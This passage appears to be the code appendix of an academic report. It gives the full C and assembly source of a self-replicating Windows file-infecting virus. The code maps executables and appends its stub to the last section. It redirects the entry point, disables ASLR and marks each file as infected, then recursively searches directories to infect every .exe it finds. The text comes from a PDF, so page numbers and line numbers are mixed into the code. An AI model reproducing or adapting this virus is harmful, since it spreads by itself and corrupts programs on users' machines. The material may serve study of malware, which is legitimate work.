#pragma region Helper Functions

// Helper functions.115 // These are FORCEINLINE, which means we don’t have to copy them

separately, as they will be inlined.

// Source: http://www.danielvik.com/2010/02/fast-memcpy-in-c.htmlFORCEINLINE void* MemoryCopy(void *dest, const void *src, size_t count) {char *dst8 = (char*)dest;

120 char *src8 = (char*)src;

while (count--) {

*dst8++ = *src8++;}

125

return dest;}

// String methods130 FORCEINLINE int OurStringLength(const char *s){

int res = 0;char *sc = (char*)s;while(*sc != 0){

41

sc++;135 res++;

}return res;

}

140 FORCEINLINE void StrCopy(char *dest, const char *source){//MemoryCopy(dest,source,OurStringLength(source)+1);char *d = dest;const char *s = source;

145 while(*s != 0){

*d++ = *s++;}

*d = 0;}

150

FORCEINLINE void StrConcat(char *dest, const char *source){int L = OurStringLength(dest);char *d = dest;const char *s = source;

155 d += L;while(*s != 0){

*d = *s;d++; s++;

}160 *d = 0;

}

FORCEINLINE void StringToLower(char *s) {165 for (; *s; s++) {

if (*s >= ’A’ && *s <= ’Z’) {

*s = *s - (’A’ - ’a’);}

}170 }

FORCEINLINE bool StringEqualI(const char *s1, const char *s2) {char *s1_ = (char*)s1;char *s2_ = (char*)s2;

175 StringToLower(s1_);StringToLower(s2_);while (*s1_ == *s2_) {if (*s1_ == ’\0’ || *s2_ == ’\0’)

return true;180

s1_++; s2_++;}

return false;185 }

// Returns true iff str ends with suffix.// Source: http://stackoverflow.com/a/7718223FORCEINLINE int endsWith(const char *str, const char *suffix) {

42 APPENDIX A. INFECTION CODE

190 if(str == NULL || suffix == NULL)return 0;

size_t strLen = OurStringLength(str);size_t suffixLen = OurStringLength(suffix);

195

if(suffixLen > strLen)return 0;

return StringEqualI(str + strLen - suffixLen, suffix);200 }

// Convert (absolute) address in file to virtual address.FORCEINLINE DWORD FileToVA(DWORD dwFileAddr, PIMAGE_NT_HEADERS pNtHeaders)

{PIMAGE_SECTION_HEADER lpSecHdr = (PIMAGE_SECTION_HEADER)((DWORD)

pNtHeaders + sizeof(IMAGE_NT_HEADERS));205 for(WORD wSections = 0; wSections < pNtHeaders->FileHeader.

NumberOfSections; wSections++) {if(dwFileAddr >= lpSecHdr->PointerToRawData) {if(dwFileAddr < (lpSecHdr->PointerToRawData + lpSecHdr->

SizeOfRawData)) {dwFileAddr -= lpSecHdr->PointerToRawData;dwFileAddr += (pNtHeaders->OptionalHeader.ImageBase + lpSecHdr->

VirtualAddress);210 return dwFileAddr;

}}

lpSecHdr++;215 }

return NULL;}

220 // Convert Relative Virtual Adress to offset within section.FORCEINLINE DWORD Rva2Offset(DWORD dwRva, PIMAGE_SECTION_HEADER

dwSectionRva, USHORT uNumberOfSections) {for (USHORT i=0; i<uNumberOfSections; i++) {

if (dwRva >= dwSectionRva->VirtualAddress)if (dwRva < dwSectionRva->VirtualAddress + dwSectionRva->Misc.

VirtualSize)225 return (DWORD)(dwRva - dwSectionRva->VirtualAddress + dwSectionRva

->PointerToRawData) ;dwSectionRva++;

}return (DWORD)-1;

}230

// In pars, set baseFunctionRVAinIAT, walkOffsetLL and walkOffsetGPA.FORCEINLINE bool setLLAndGPA(Parameters *pars, Constants *consts, LPBYTE

hMap, IMAGE_NT_HEADERS *pNtHeaders, IMAGE_SECTION_HEADER *pFirstSection) {

// Load libraries.HMODULE hUser32 = LoadLibrary("User32.dll");

235 HMODULE hKernel32 = LoadLibrary("Kernel32.dll");

43

if(!hUser32 || !hKernel32) {printf("[-] Could not load User32.dll or Kernel32.dll");return false;

}240

// Read imports.PIMAGE_IMPORT_DESCRIPTOR pImports = (PIMAGE_IMPORT_DESCRIPTOR)((DWORD)

hMap + Rva2Offset(pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress, pFirstSection,pNtHeaders->FileHeader.NumberOfSections));

// Look at the import address table of the host.245 DWORD baseFuncRVA;

char* baseFuncName = NULL;while(pImports->Name) {char* s = (char*)((DWORD)hMap + Rva2Offset(pImports->Name,

pFirstSection, pNtHeaders->FileHeader.NumberOfSections));printf("DLL: %s\n",s);

250 DWORD pImageThunk = pImports->OriginalFirstThunk ? pImports->OriginalFirstThunk : pImports->FirstThunk;

PIMAGE_THUNK_DATA itd = (PIMAGE_THUNK_DATA)((DWORD)hMap + Rva2Offset(pImageThunk, pFirstSection, pNtHeaders->FileHeader.NumberOfSections));

pImageThunk = pImports->FirstThunk;while(itd->u1.AddressOfData) {

255 PIMAGE_IMPORT_BY_NAME name_import = (IMAGE_IMPORT_BY_NAME*)((DWORD)hMap + Rva2Offset((DWORD)itd->u1.AddressOfData, pFirstSection,pNtHeaders->FileHeader.NumberOfSections));

// Get a any (first) imported function from kernel32.dllif(!stricmp( s, "kernel32.dll")) {

baseFuncRVA = pNtHeaders->OptionalHeader.ImageBase + pImageThunk;baseFuncName = (char*)name_import->Name;

260 break;}itd++;pImageThunk += sizeof(DWORD);

}265 pImports++;

}if(baseFuncName != NULL) // if we didn’t find an import from kernel32.

dll (e.g. for .NET executables), don’t infect the fileprintf("Using %s’s function address to find LoadLibraryA and

GetProcAddress\n", baseFuncName);else

270 return false;

// Set parameters.DWORD addressBaseFunc = (DWORD)GetProcAddress(hKernel32, baseFuncName);pars->baseFunctionRVAinIAT = baseFuncRVA;

275 pars->walkOffsetLL = (DWORD)GetProcAddress(hKernel32, "LoadLibraryA") -addressBaseFunc;

pars->walkOffsetGPA = (DWORD)GetProcAddress(hKernel32, "GetProcAddress")- addressBaseFunc;

// Free libraries.

44 APPENDIX A. INFECTION CODE

FreeLibrary(hUser32);280 FreeLibrary(hKernel32);

return true;}

285 // In pars, set baseFunctionRVAinIAT, walkOffsetLL and walkOffsetGPA.FORCEINLINE bool setLLAndGPA2(Functions *f, Parameters *pars, Constants *

consts, LPBYTE hMap, IMAGE_NT_HEADERS *pNtHeaders,IMAGE_SECTION_HEADER *pFirstSection) {

// Load libraries.HMODULE hUser32 = f->LoadLibrary(consts->user32dll);HMODULE hKernel32 = f->LoadLibrary(consts->kernel32dll);

290 if(!hUser32 || !hKernel32) {return false;

}

// Read imports.295 PIMAGE_IMPORT_DESCRIPTOR pImports = (PIMAGE_IMPORT_DESCRIPTOR)((DWORD)

hMap + Rva2Offset(pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress, pFirstSection,pNtHeaders->FileHeader.NumberOfSections));

// Look at the import address table of the host.DWORD baseFuncRVA;char* baseFuncName = NULL;

300 while(pImports->Name) {char* s = (char*)((DWORD)hMap + Rva2Offset(pImports->Name,

pFirstSection, pNtHeaders->FileHeader.NumberOfSections));DWORD pImageThunk = pImports->OriginalFirstThunk ? pImports->

OriginalFirstThunk : pImports->FirstThunk;PIMAGE_THUNK_DATA itd = (PIMAGE_THUNK_DATA)((DWORD)hMap + Rva2Offset(

pImageThunk, pFirstSection, pNtHeaders->FileHeader.NumberOfSections));

305 pImageThunk = pImports->FirstThunk;while(itd->u1.AddressOfData) {PIMAGE_IMPORT_BY_NAME name_import = (IMAGE_IMPORT_BY_NAME*)((DWORD)

hMap + Rva2Offset((DWORD)itd->u1.AddressOfData, pFirstSection,pNtHeaders->FileHeader.NumberOfSections));

// Get a any (first) imported function from kernel32.dllif(StringEqualI( s, consts->kernel32dll)) {

310 baseFuncRVA = pNtHeaders->OptionalHeader.ImageBase + pImageThunk;baseFuncName = (char*)name_import->Name;break;

}itd++;

315 pImageThunk += sizeof(DWORD);}pImports++;

}

320 if(baseFuncName == NULL) // if we didn’t find an import from kernel32.dll (e.g. for .NET executables), don’t infect the file

return false;

45

// Set parameters.DWORD addressBaseFunc = (DWORD)f->GetProcAddress(hKernel32, baseFuncName

);325 pars->baseFunctionRVAinIAT = baseFuncRVA;

pars->walkOffsetLL = (DWORD)f->GetProcAddress(hKernel32, consts->loadlibrarya) - addressBaseFunc;

pars->walkOffsetGPA = (DWORD)f->GetProcAddress(hKernel32, consts->getprocaddress) - addressBaseFunc;

// Free libraries.330 f->FreeLibrary(hUser32);

f->FreeLibrary(hKernel32);

return true;}

335

#pragma endregion

#pragma region Infect Exe

340 // Infect another exe.FORCEINLINE int infectExe(Parameters *pars, Constants *consts, Functions *

f, const char *fileName) {PIMAGE_DOS_HEADER pDosHeader;PIMAGE_NT_HEADERS pNtHeaders;PIMAGE_SECTION_HEADER pFirstSection, pLastSection, pSectionHeader;

345 HANDLE hFile, hFileMap;LPBYTE hMap;

int i = 0, charcounter = 0;DWORD oepRva = 0, oep = 0, fsize = 0;

350

// Map file to infect.hFile = f->CreateFile(fileName, GENERIC_WRITE | GENERIC_READ,

FILE_SHARE_READ | FILE_SHARE_WRITE,NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

if(hFile == INVALID_HANDLE_VALUE) {355 return -1;

}

fsize = f->GetFileSize(hFile, 0);if(!fsize) {

360 f->CloseHandle(hFile);return -2;

}

hFileMap = f->CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, fsize,NULL);

365 if(!hFileMap) {f->CloseHandle(hFile);return -3;

}

370 hMap = (LPBYTE)f->MapViewOfFile(hFileMap, FILE_MAP_ALL_ACCESS, 0, 0,fsize);

if(!hMap) {

46 APPENDIX A. INFECTION CODE

f->CloseHandle(hFileMap);f->CloseHandle(hFile);return -4;

375 }

// Check signatures, to see whether it’s a valid EXE.pDosHeader = (PIMAGE_DOS_HEADER)hMap;if(pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {

380 goto cleanup;return -8;

}

if(pDosHeader->e_res[0] == 0x424a){385 goto cleanup;

}

pNtHeaders = (PIMAGE_NT_HEADERS)((DWORD)hMap + pDosHeader->e_lfanew);if(pNtHeaders->Signature != IMAGE_NT_SIGNATURE) {

390 goto cleanup;return -9;

}

// Get first and last section.395 pSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)hMap + pDosHeader->

e_lfanew + sizeof(IMAGE_NT_HEADERS));pFirstSection = pSectionHeader;pLastSection = pFirstSection + (pNtHeaders->FileHeader.NumberOfSections

- 1);

// backup parameters.400 pars->baseFunctionRVAinIAT2 = pars->baseFunctionRVAinIAT;

pars->walkOffsetLL2 = pars->walkOffsetLL;pars->walkOffsetGPA2 = pars->walkOffsetGPA;// Addresses/offsets of library functions.// Fill in the ’base address’ and offsets to LoadLibraryA and

GetProcAddress.405 // This way, we can use those functions even if they are not originally

imported by the host program.if(!setLLAndGPA2(f, pars, consts, hMap, pNtHeaders, pFirstSection)) {

goto cleanup;}

410 // Work out extra size needed in exe, rounded up to be a multiple ofalignment.

// e.g. totalSize = 280, FileAlignment = 200 => sizeNeeded = 400;DWORD alignment = pNtHeaders->OptionalHeader.FileAlignment;DWORD alignedTotalSize = (( (pLastSection->Misc.VirtualSize+consts->

totalSize) / alignment) + 1) * alignment;DWORD sizeIncrease = (alignedTotalSize-pLastSection->SizeOfRawData);

415

// Reload file map and increase the fileSize by what we need to injectour code (respecting the FileAlignment)

// First, clean up old map.f->FlushViewOfFile(hMap, 0);f->UnmapViewOfFile(hMap);

420 f->CloseHandle(hFileMap);

47

// Increase file size.// Note: actual file size increase will be handled by the SetFilePointer

and SetEndOfFile function calls in the clean up section.fsize += sizeIncrease;

425

// Re-create map.hFileMap = f->CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, fsize,

NULL);if(!hFileMap) {f->CloseHandle(hFile);

430 return -5;}

hMap = (LPBYTE)f->MapViewOfFile(hFileMap, FILE_MAP_ALL_ACCESS, 0, 0,fsize);

if(!hMap) {435 f->CloseHandle(hFileMap);

f->CloseHandle(hFile);return -6;

}

440 // Re-read signatures.pDosHeader = (PIMAGE_DOS_HEADER)hMap;pNtHeaders = (PIMAGE_NT_HEADERS)((DWORD)hMap + pDosHeader->e_lfanew);

// Get first and last section.445 pSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)hMap + pDosHeader->

e_lfanew + sizeof(IMAGE_NT_HEADERS));pFirstSection = pSectionHeader;pLastSection = pFirstSection + (pNtHeaders->FileHeader.NumberOfSections

- 1);

// Create a place for our viral thread and its parameters, by extendingthe last section.

450 pLastSection->Misc.VirtualSize += consts->totalSize;pLastSection->SizeOfRawData = alignedTotalSize;pLastSection->Characteristics |= IMAGE_SCN_MEM_WRITE |

IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE;pNtHeaders->OptionalHeader.SizeOfImage = pLastSection->VirtualAddress +

pLastSection->Misc.VirtualSize; // ?? stackoverflow.com/a/8197500

455 // Save original entrypoint.oep = oepRva = pNtHeaders->OptionalHeader.AddressOfEntryPoint;oep += (pSectionHeader->PointerToRawData) - (pSectionHeader->

VirtualAddress);

// Write our code to the last section.460 PBYTE startInjectedCode = (PBYTE)hMap + pLastSection->PointerToRawData +

pLastSection->Misc.VirtualSize - consts->totalSize;MemoryCopy(startInjectedCode, pars, consts->totalSize);// restore parameters from backuppars->baseFunctionRVAinIAT = pars->baseFunctionRVAinIAT2;pars->walkOffsetLL = pars->walkOffsetLL2;

465 pars->walkOffsetGPA = pars->walkOffsetGPA2;

48 APPENDIX A. INFECTION CODE

// Fill in place holders.

*(u_long *)(startInjectedCode + sizeof(Parameters) + sizeof(Constants) +consts->oepOffset) = pNtHeaders->OptionalHeader.ImageBase + oepRva;

*(u_long *)(startInjectedCode + sizeof(Parameters) + sizeof(Constants) +consts->parsOffset) = pNtHeaders->OptionalHeader.ImageBase +pLastSection->VirtualAddress + pLastSection->Misc.VirtualSize -consts->totalSize;

470 *(u_long *)(startInjectedCode + sizeof(Parameters) + sizeof(Constants) +consts->saOffset) = pNtHeaders->OptionalHeader.ImageBase +pLastSection->VirtualAddress + pLastSection->Misc.VirtualSize -consts->totalSize + sizeof(Parameters) + sizeof(Constants) + consts->aStubSize;

// Set new entrypoint.pNtHeaders->OptionalHeader.AddressOfEntryPoint = pLastSection->

VirtualAddress + pLastSection->Misc.VirtualSize - consts->totalSize+ sizeof(Parameters) + sizeof(Constants);

475 // Write our signaturepDosHeader->e_res[0] = (DWORD)0x424a;

// Remove dynamic base if it is usedif( pNtHeaders->OptionalHeader.DllCharacteristics & 0x0040 )

480 pNtHeaders->OptionalHeader.DllCharacteristics ˆ= 0x0040;

cleanup:f->FlushViewOfFile(hMap, 0);f->UnmapViewOfFile(hMap);

485 f->CloseHandle(hFileMap);

f->SetFilePointer(hFile, fsize, NULL, FILE_BEGIN);f->SetEndOfFile(hFile);f->CloseHandle(hFile);

490 return 0;}

#pragma endregion

495

#pragma region Virus Code

// Virus code. This will be copied between EXEs.#pragma code_seg(".viruscode")

500 #pragma data_seg(".virusdata") // Data segment should stay empty, we won’tcopy it.

// Assembly stub. This will be the new entry point of the EXE.// Contains three placeholders, which need to be filled in.__declspec(naked) void AStubStart() {

505 __asm{pushad // preserve our thread context

// Call CStubStartpush 0xCCCCCCCC // parameters: pointer to Parameters, passed to

CStubStart.510 mov eax, 0xCCCCCCCC // sa: address at which CStubStart can be found.

49

call eax

popad // restore our thread contextpush 0xCCCCCCCC // push address of original entrypoint

515 retn // retn used as jmp}

}

// C stub. Main code of our virus.520 // This starts a new thread, and then returns to the original code.

void CStubStart(Parameters *pars) {Constants *consts = (Constants*)((DWORD)pars + sizeof(Parameters));DWORD addrOfSelf = (DWORD)pars + consts->offsetCStubStart;

525 LoadLibraryFun loadLibraryF = (LoadLibraryFun)(*(DWORD*)pars->baseFunctionRVAinIAT + pars->walkOffsetLL);

GetProcAddressFun getProcAddressF = (GetProcAddressFun)(*(DWORD*)pars->baseFunctionRVAinIAT + pars->walkOffsetGPA);

HMODULE user32 = loadLibraryF(consts->user32dll);HMODULE kernel32 = loadLibraryF(consts->kernel32dll);

530 MessageBoxFun msgBoxAF = (MessageBoxFun)getProcAddressF(user32, consts->messageboxa);

CreateThreadFun createThreadF = (CreateThreadFun)getProcAddressF(kernel32, consts->createthread);

msgBoxAF(NULL, consts->text, consts->caption, consts->buttons);

535 DWORD addrOfThreadStart = addrOfSelf + consts->offsetThreadStart;

// Useful if we want to call ThreadStart directly, i.e. not in a newthread:

//ThreadStartFun threadStartF = (ThreadStartFun)(addrOfThreadStart);

540 createThreadF(NULL, 0, (LPTHREAD_START_ROUTINE)addrOfThreadStart, pars,0, NULL);

return;}

// Start of new thread. Will be called by C stub in a new thread.545 DWORD ThreadStart(LPVOID parsVoid) {

Parameters *pars = (Parameters*)parsVoid;Constants *consts = (Constants*)((DWORD)pars + sizeof(Parameters));

LoadLibraryFun loadLibraryF = (LoadLibraryFun)(*(DWORD*)pars->baseFunctionRVAinIAT + pars->walkOffsetLL);

550 GetProcAddressFun getProcAddressF = (GetProcAddressFun)(*(DWORD*)pars->baseFunctionRVAinIAT + pars->walkOffsetGPA);

HMODULE user32 = loadLibraryF(consts->user32dll);HMODULE kernel32 = loadLibraryF(consts->kernel32dll);

555 Functions f;f.MessageBox = (MessageBoxFun)getProcAddressF(user32, consts->

messageboxa);f.CreateThread = (CreateThreadFun)getProcAddressF(kernel32, consts->

50 APPENDIX A. INFECTION CODE

createthread);f.CreateFile = (CreateFileFun)getProcAddressF(kernel32, consts->

createfilea);f.GetFileSize = (GetFileSizeFun)getProcAddressF(kernel32, consts->

getfilesize);560 f.CreateFileMapping = (CreateFileMappingFun)getProcAddressF(kernel32,

consts->createfilemappinga);f.MapViewOfFile = (MapViewOfFileFun)getProcAddressF(kernel32, consts->

mapviewoffile);f.FlushViewOfFile = (FlushViewOfFileFun)getProcAddressF(kernel32, consts

->flushviewoffile);f.UnmapViewOfFile = (UnmapViewOfFileFun)getProcAddressF(kernel32, consts

->unmapviewoffile);f.SetFilePointer = (SetFilePointerFun)getProcAddressF(kernel32, consts->

setfilepointer);565 f.SetEndOfFile = (SetEndOfFileFun)getProcAddressF(kernel32, consts->

setendoffile);f.CloseHandle = (CloseHandleFun)getProcAddressF(kernel32, consts->

closehandle);f.LoadLibrary = loadLibraryF;f.GetProcAddress = getProcAddressF;f.FreeLibrary = (FreeLibraryFun)getProcAddressF(kernel32, consts->

freelibrary);570 f.FindFirstFile = (FindFirstFileFun)getProcAddressF(kernel32, consts->

findfirstfile);f.FindNextFile = (FindNextFileFun)getProcAddressF(kernel32, consts->

findnextfile);

DWORD addrOfCStub = (DWORD)pars + consts->offsetCStubStart;DWORD addrOfInfectDir = addrOfCStub + consts->offsetInfectDir;

575 infectDirFun infectDirF = (infectDirFun)addrOfInfectDir;infectDirF(consts->targetPath,addrOfInfectDir, pars, consts, &f);return 0;

}

580 void infectDir(const char *path, DWORD addrOfInfectDir, Parameters *pars,Constants *consts, Functions *f) {

infectDirFun infectDirF = (infectDirFun)addrOfInfectDir;WIN32_FIND_DATA findData;char searchPath[STR_MAX_LENGTH];

585 char backSlashStar[3]; backSlashStar[0] = ’\\’; backSlashStar[1] = ’*’;backSlashStar[2] = 0;

char backSlash[2]; backSlash[0] = ’\\’; backSlash[1] = 0;

StrCopy(searchPath, path);StrConcat(searchPath, backSlashStar);

590 HANDLE hFind = f->FindFirstFile(searchPath, &findData);

do {// . and ..: skipif (findData.cFileName[0] == ’.’)

595 continue;

// .exe: interestingchar exe[5]; exe[0] = ’.’; exe[1] = ’e’; exe[2] = ’x’; exe[3] = ’e’;

51

exe[4] = 0;if (endsWith(findData.cFileName, exe)) {

600 char exePath[STR_MAX_LENGTH];StrCopy(exePath, path);StrConcat(exePath, backSlash);StrConcat(exePath, findData.cFileName);infectExe(pars, consts, f, exePath);

605 }

// dir: recurseif (findData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {

char dirPath[STR_MAX_LENGTH];610 StrCopy(dirPath, path);

StrConcat(dirPath, backSlash);StrConcat(dirPath, findData.cFileName);infectDirF(dirPath, addrOfInfectDir, pars, consts, f);

}615 } while (f->FindNextFile(hFind, &findData));

}

// Marker for end of virus code.void VCodeEnd() {}

620

#pragma data_seg()#pragma code_seg()

#pragma endregion625

#pragma region Main

// First generation.630 int main(int argc, char* argv[]) {

PIMAGE_DOS_HEADER pDosHeader;PIMAGE_NT_HEADERS pNtHeaders;PIMAGE_SECTION_HEADER pFirstSection, pLastSection, pSectionHeader;HANDLE hFile, hFileMap;

635 LPBYTE hMap;

int i = 0, charcounter = 0;DWORD oepRva = 0, oep = 0, fsize = 0, parsOffset = 0, saOffset = 0,

oepOffset = 0;

640 // Work out stub size.// Our viral code contains: parameters, constants, assembly stub, C stub

.DWORD aStubSize = (DWORD)CStubStart - (DWORD)AStubStart;DWORD cStubSize = (DWORD)VCodeEnd - (DWORD)CStubStart;DWORD stubSize = (DWORD)VCodeEnd - (DWORD)AStubStart; // Not including

parameters or constants645 DWORD totalSize = stubSize + sizeof(Parameters) + sizeof(Constants);

// Map file to infect.const char *fileName = "PEview.exe";hFile = CreateFile(fileName, GENERIC_WRITE | GENERIC_READ,

FILE_SHARE_READ | FILE_SHARE_WRITE,

52 APPENDIX A. INFECTION CODE

650 NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);if(hFile == INVALID_HANDLE_VALUE) {

printf("[-] Cannot open %s\n", fileName);return 1;

}655

fsize = GetFileSize(hFile, 0);if(!fsize) {

printf("[-] Could not get files size\n");CloseHandle(hFile);

660 return 0;}

hFileMap = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, fsize, NULL);

if(!hFileMap) {665 printf("[-] CreateFileMapping failed\n");

CloseHandle(hFile);return 0;

}

670 hMap = (LPBYTE)MapViewOfFile(hFileMap, FILE_MAP_ALL_ACCESS, 0, 0, fsize);

if(!hMap) {printf("[-] MapViewOfFile failed\n");CloseHandle(hFileMap);CloseHandle(hFile);

675 return 0;}

// Check signatures, to see whether it’s a valid EXE.pDosHeader = (PIMAGE_DOS_HEADER)hMap;

680 if(pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {printf("[-] DOS signature not found\n");goto cleanup;

}

685 if(pDosHeader->e_res[0] == 0x424a){printf("[-] File aleady infected\n");goto cleanup;

}

690 pNtHeaders = (PIMAGE_NT_HEADERS)((DWORD)hMap + pDosHeader->e_lfanew);if(pNtHeaders->Signature != IMAGE_NT_SIGNATURE) {

printf("[-] NT signature not found\n");goto cleanup;

}695

pSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)hMap + pDosHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS));

pFirstSection = pSectionHeader;pLastSection = pFirstSection + (pNtHeaders->FileHeader.NumberOfSections

- 1);

700 // Copy stub into a buffer.unsigned char *aStub = (unsigned char *)HeapAlloc(GetProcessHeap(), NULL

53

, aStubSize);if (aStub == NULL) {printf("[-] Failed to allocate memory for aStub.\n");goto cleanup;

705 }memcpy(aStub, AStubStart, aStubSize);

// Locate offsets of place holders in assembly stub.for(i = 0, charcounter = 0; i != aStubSize; i++) {

710 if(aStub[i] == 0xCC) {charcounter++;if(charcounter == 4 && parsOffset == 0)

parsOffset = i - 3;else if(charcounter == 4 && saOffset == 0)

715 saOffset = i - 3;else if(charcounter == 4 && oepOffset == 0)

oepOffset = i - 3;} else {

charcounter = 0;720 }

}

// Create parameters and constants.Parameters pars; memset(&pars, 0, sizeof(Parameters));

725 Constants consts; memset(&consts, 0, sizeof(Constants));// Fill in sizes.consts.aStubSize = aStubSize;consts.cStubSize = cStubSize;consts.stubSize = stubSize;

730 consts.totalSize = totalSize;// Fill in offsets of placeholders.consts.parsOffset = parsOffset;consts.saOffset = saOffset;consts.oepOffset = oepOffset;

735 // Fill in strings.strcpy(consts.user32dll, "User32.dll");strcpy(consts.kernel32dll, "Kernel32.dll");strcpy(consts.createthread, "CreateThread");strcpy(consts.createfilea, "CreateFileA");

740 strcpy(consts.getfilesize, "GetFileSize");strcpy(consts.createfilemappinga, "CreateFileMappingA");strcpy(consts.mapviewoffile, "MapViewOfFile");strcpy(consts.copymemory, "CopyMemory");strcpy(consts.flushviewoffile, "FlushViewOfFile");

745 strcpy(consts.unmapviewoffile, "UnmapViewOfFile");strcpy(consts.setfilepointer, "SetFilePointer");strcpy(consts.setendoffile, "SetEndOfFile");strcpy(consts.closehandle, "CloseHandle");strcpy(consts.loadlibrarya, "LoadLibraryA");

750 strcpy(consts.getprocaddress, "GetProcAddress");strcpy(consts.freelibrary, "FreeLibrary");strcpy(consts.messageboxa, "MessageBoxA");strcpy(consts.findfirstfile, "FindFirstFileA");strcpy(consts.findnextfile, "FindNextFileA");

755 strcpy(consts.text, "Hello by Beerend & Janwillem!");strcpy(consts.caption, "Injection result");


strcpy(consts.targetPath, "C:\\test");consts.buttons = MB_OKCANCEL | MB_ICONQUESTION;// Offsets of functions.

760 consts.offsetCStubStart = sizeof(Parameters) + sizeof(Constants) +aStubSize;

consts.offsetThreadStart = (DWORD)ThreadStart - (DWORD)CStubStart;consts.offsetInfectDir = (DWORD)infectDir - (DWORD)CStubStart;// Addresses/offsets of library functions.// Fill in the ’base address’ and offsets to LoadLibraryA and

GetProcAddress.765 // This way, we can use those functions even if they are not originally

imported by the host program.if(!setLLAndGPA(&pars, &consts, hMap, pNtHeaders, pFirstSection)) {

printf("[-] Failed to set LL and GPA walk offsets.\n");HeapFree(GetProcessHeap(), NULL, aStub);goto cleanup;

770 }

// Work out extra size needed in exe, rounded up to be a multiple ofalignment.

// e.g. totalSize = 280, FileAlignment = 200 => sizeNeeded = 400;printf("Last section virtual size = %i\n", pLastSection->Misc.

VirtualSize);775 printf("Last section raw size = %i\n", pLastSection->SizeOfRawData);

printf("Viral code size = %i\n", totalSize);printf("File Alignment = %i\n", pNtHeaders->OptionalHeader.FileAlignment

);printf("Section Alignment = %i\n", pNtHeaders->OptionalHeader.

SectionAlignment);DWORD alignment = pNtHeaders->OptionalHeader.FileAlignment;

780 DWORD alignedTotalSize = (( (pLastSection->Misc.VirtualSize+totalSize) /alignment) + 1) * alignment;

DWORD sizeIncrease = (alignedTotalSize-pLastSection->SizeOfRawData);printf("Aligned section+viral code size = %i\n", alignedTotalSize);

// Reload file map and increase the fileSize by what we need to injectour code (respecting the FileAlignment)

785 // First, clean up old map.FlushViewOfFile(hMap, 0);UnmapViewOfFile(hMap);CloseHandle(hFileMap);

790 // Increase file size.// Note: actual file size increase will be handled by the SetFilePointer

and SetEndOfFile function calls in the clean up section.fsize += sizeIncrease;

// Re-create map.795 hFileMap = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, fsize, NULL

);if(!hFileMap) {

printf("[-] CreateFileMapping failed\n");CloseHandle(hFile);return 0;

800 }


hMap = (LPBYTE)MapViewOfFile(hFileMap, FILE_MAP_ALL_ACCESS, 0, 0, fsize);

if(!hMap) {printf("[-] MapViewOfFile failed\n");

805 CloseHandle(hFileMap);CloseHandle(hFile);return 0;

}

810 // Re-read signatures.pDosHeader = (PIMAGE_DOS_HEADER)hMap;pNtHeaders = (PIMAGE_NT_HEADERS)((DWORD)hMap + pDosHeader->e_lfanew);

// Get first and last section.815 pSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)hMap + pDosHeader->

e_lfanew + sizeof(IMAGE_NT_HEADERS));pFirstSection = pSectionHeader;pLastSection = pFirstSection + (pNtHeaders->FileHeader.NumberOfSections

- 1);

// Create a place for our viral thread and its parameters, by extendingthe last section.

820 pLastSection->Misc.VirtualSize += totalSize;pLastSection->SizeOfRawData = alignedTotalSize;pLastSection->Characteristics |= IMAGE_SCN_MEM_WRITE |

IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE;//pNtHeaders->OptionalHeader.SizeOfImage += alignedTotalSize;printf("Old SizeOfImage: %i\n", pNtHeaders->OptionalHeader.SizeOfImage);

825 printf("New SizeOfImage: %i\n", pLastSection->VirtualAddress +pLastSection->Misc.VirtualSize);

pNtHeaders->OptionalHeader.SizeOfImage = pLastSection->VirtualAddress +pLastSection->Misc.VirtualSize; // ?? stackoverflow.com/a/8197500

// Save original entrypoint.oep = oepRva = pNtHeaders->OptionalHeader.AddressOfEntryPoint;

830 oep += (pSectionHeader->PointerToRawData) - (pSectionHeader->VirtualAddress);

// Fill in place holders.

*(u_long *)(aStub + oepOffset) = pNtHeaders->OptionalHeader.ImageBase +oepRva;

*(u_long *)(aStub + parsOffset) = pNtHeaders->OptionalHeader.ImageBase +pLastSection->VirtualAddress + pLastSection->Misc.VirtualSize -totalSize;

835 *(u_long *)(aStub + saOffset) = pNtHeaders->OptionalHeader.ImageBase +pLastSection->VirtualAddress + pLastSection->Misc.VirtualSize -totalSize + sizeof(Parameters) + sizeof(Constants) + aStubSize;

// Write our code to the last section.PBYTE startInjectedCode = (PBYTE)hMap + pLastSection->PointerToRawData +

pLastSection->Misc.VirtualSize - totalSize;memcpy(startInjectedCode, &pars, sizeof(Parameters));

840 memcpy(startInjectedCode + sizeof(Parameters), &consts, sizeof(Constants));

memcpy(startInjectedCode + sizeof(Parameters) + sizeof(Constants), aStub, aStubSize);


memcpy(startInjectedCode + sizeof(Parameters) + sizeof(Constants) +aStubSize, CStubStart, cStubSize);

// Set new entrypoint.845 pNtHeaders->OptionalHeader.AddressOfEntryPoint = pLastSection->

VirtualAddress + pLastSection->Misc.VirtualSize - totalSize + sizeof(Parameters) + sizeof(Constants);

// Write our signaturepDosHeader->e_res[0] = (DWORD)0x424a;

850 // Remove dynamic base if it is usedif( pNtHeaders->OptionalHeader.DllCharacteristics & 0x0040 )

pNtHeaders->OptionalHeader.DllCharacteristics ˆ= 0x0040;

// Clean up.855 printf("[+] Stub written!!\n[*] Cleaning up\n");

HeapFree(GetProcessHeap(), NULL, aStub);

cleanup:FlushViewOfFile(hMap, 0);

860 UnmapViewOfFile(hMap);CloseHandle(hFileMap);

SetFilePointer(hFile, fsize, NULL, FILE_BEGIN);SetEndOfFile(hFile);

865 CloseHandle(hFile);return 0;

}

#pragma endregion
